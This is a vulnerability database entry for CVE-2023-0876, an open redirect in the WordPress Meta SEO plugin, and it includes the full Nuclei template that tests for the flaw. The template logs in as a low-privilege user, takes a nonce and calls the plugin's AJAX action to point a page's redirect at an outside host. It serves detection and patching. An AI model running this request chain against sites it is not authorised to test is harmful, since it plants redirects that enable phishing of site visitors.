WordPress Meta SEO <= 4.5.2 - Open Redirect

🗓️ 29 Jun 2026 05:52:57Reported by ProjectDiscoveryType

WordPress Meta SEO up to version 4.5.2 allows arbitrary redirects via unauthorized AJAX actions; upgrade to 4.5.3 or later.

Reporter	Title	Published	Views	Family All 15
Circl	CVE-2023-0876	20 Mar 202321:04	–	circl
CNNVD	WordPress Plugin WP Meta SEO 输入验证错误漏洞	20 Mar 202300:00	–	cnnvd
CVE	CVE-2023-0876	20 Mar 202315:52	–	cve
Cvelist	CVE-2023-0876 WP Meta SEO < 4.5.3 - Subscriber+ Improper Authorization causing Arbitrary Redirect	20 Mar 202315:52	–	cvelist
EUVD	EUVD-2023-12867	3 Oct 202520:07	–	euvd
NVD	CVE-2023-0876	20 Mar 202316:15	–	nvd
OpenVAS	WordPress WP Meta SEO Plugin < 4.5.3 Open Redirect Vulnerability	11 May 202300:00	–	openvas
OSV	CVE-2023-0876	20 Mar 202316:15	–	osv
Prion	Spoofing	20 Mar 202316:15	–	prion
Positive Technologies	PT-2023-16580	20 Mar 202300:00	–	ptsecurity

Source	Link
wpscan	www.wpscan.com/vulnerability/1a8c97f9-98fa-4e29-b7f7-bb9abe0c42ea/
api	www.api.first.org/data/v1/epss

id: CVE-2023-0876

info:
  name: WordPress Meta SEO <= 4.5.2 - Open Redirect
  author: Khalid6468
  severity: medium
  description: |
    The WP Meta SEO WordPress plugin before 4.5.3 did not authorize several AJAX actions, which allowed low-privilege users to update certain data and resulted in an arbitrary redirect vulnerability.
  impact: |
    Authenticated attackers with low privileges can exploit unauthorized AJAX actions to update link redirects and create arbitrary redirect vulnerabilities that could be used for phishing attacks.
  remediation: |
    Update the plugin to version 4.5.3 or later to fix the arbitrary redirect vulnerability.
  reference:
    - https://wpscan.com/vulnerability/1a8c97f9-98fa-4e29-b7f7-bb9abe0c42ea/
    - https://api.first.org/data/v1/epss?cve=CVE-2023-0876&pretty=true
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-0876
    cwe-id: CWE-601
    epss-score: 0.00713
    epss-percentile: 0.48981
    cpe: cpe:2.3:a:joomunited:wp_meta_seo:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    fofa-query: body="/wp-content/plugins/wp-meta-seo/"
    vendor: joomunited
    product: wp_meta_seo
    framework: wordpress
  tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,wp-meta-seo,redirect,vkev,vuln

variables:
  link_endpoint: "{{rand_text_numeric(5)}}"
  redirect_url: "https://oast.me"

flow: http(1) || http(2) && http(3) && http(4) && http(5) && http(6)

http:
  - raw:
      - |
        GET /wp-content/plugins/wp-meta-seo/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - compare_versions(version, '<= 4.5.2')
        condition: and

    extractors:
      - type: regex
        part: body
        name: version
        group: 1
        regex:
          - 'Stable tag: ([0-9.]+)'
        internal: true

  - raw:
      - |
        GET /?p={{link_endpoint}} HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: dsl
        dsl:
          - "status_code == 404"
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302 || status_code == 200'
          - 'contains(header, "wordpress_logged_in")'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, 'wpms_nonce')"
        condition: and
        internal: true

    extractors:
      - type: regex
        name: wpms_nonce
        group: 1
        regex:
          - 'wpms_nonce.*?([0-9a-z]+)'
        part: body
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=wpms&wpms_nonce={{wpms_nonce}}&task=update_link_redirect&link_id={{link_id}}&link_redirect={{redirect_url}}
#The WP Meta SEO plugin automatically created entries in the wp_wpms_links table for 404 pages, with the link_id field stored in this DB table. This link_id input was required to validate the redirection.
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_any(body, 'status', 'contains','success', 'updated','redirect')"
        condition: and
        internal: true

  - raw:
      - |
        GET /?p={{link_endpoint}} HTTP/1.1
        Host: {{Hostname}}

    redirects: false
    max-redirects: 0

    matchers:
      - type: dsl
        dsl:
          - "status_code == 302"
          - 'contains(header, "Location: {{redirect_url}}")'
        condition: and
# digest: 490a0046304402205043c00536b742a831f4f8008bb4470fd0cbf8a0c1ec480717f047468b76056d02202abf5f5194c08bcaf5b3655b6bf8d85fee9d1267065ce497bd9ea3f077d933de:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00Current

6.5Medium risk

Vulners AI Score6.5

CVSS 3.16.1

EPSS0.00713

SSVC